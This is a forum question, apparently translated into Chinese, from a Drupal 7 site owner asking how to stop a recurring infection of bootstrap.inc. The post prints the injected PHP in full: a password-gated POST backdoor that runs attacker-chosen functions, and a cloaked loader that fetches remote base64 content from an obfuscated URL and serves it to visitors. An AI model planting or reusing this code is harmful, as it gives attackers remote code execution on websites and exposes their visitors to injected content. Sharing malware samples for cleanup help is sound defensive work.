【发布时间】:2023-03-13 09:00:01
【问题描述】:
我的托管服务提供商警告我,我的 bootstrap.inc 文件正在连接到受感染的主机。该问题应该发生在 include/bootstrap.inc 文件的 771 和 808 行之间(代码如下)。
此文件以某种方式不断更改(每周一次),从 120kb 变为 123kbs。无论发生这种情况,我都会尝试上传一个干净的文件。如果文件被更改/被黑,我的托管响应时间会延长 10-15 秒。
drupal 7 更新到 7.41,模块是最新的。 导致问题的代码位于这些行之间(我怀疑它是“cookie”部分)。这是我的托管服务提供商警告我的受感染/添加的部分:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
我不是后端开发人员,我已经使用 bootstrap 进行爱好相关项目超过 8 年了。
我试图清理 D7(重新上传新的包含、模块和除 /sites/ 之外的所有内容)。尝试在一些流行的扫描仪上进行检查。
有谁知道如何阻止对 bootstrap.inc 的更改?是否有任何成功的工具或用于扫描的模块?或者也许有人认识了这个漏洞并可以给我一个提示它来自哪里?
提前谢谢你。
【问题讨论】:
-
对此的简短更新;感谢 D7 论坛上一位非常友善的人,我假设它是这里提到的恶意软件利用:labs.sucuri.net/notes/2015-12-28 - 还没有解决它。